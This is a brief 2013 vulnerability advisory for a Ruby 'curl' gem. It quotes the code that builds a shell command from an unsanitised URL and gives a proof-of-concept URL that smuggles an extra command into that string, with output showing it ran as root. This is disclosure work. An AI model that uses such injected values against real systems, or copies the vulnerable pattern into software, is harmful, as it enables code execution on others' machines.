Curl Ruby Gem Remote command execution 3/12/2013 https://github.com/tg0/curl Specially crafted URLs can result in remote code execution: In ./lib/curl.rb the following lines: 131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" " 132 if @debug 133 puts cmd.red 134 end 135 result = open_pipe(cmd) PoC: page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"") larry@underfl0w:/tmp$ cat p uid=0(root) gid=0(root) groups=0(root) Larry W. Cashdollar @_larry0 http://vapid.dhs.org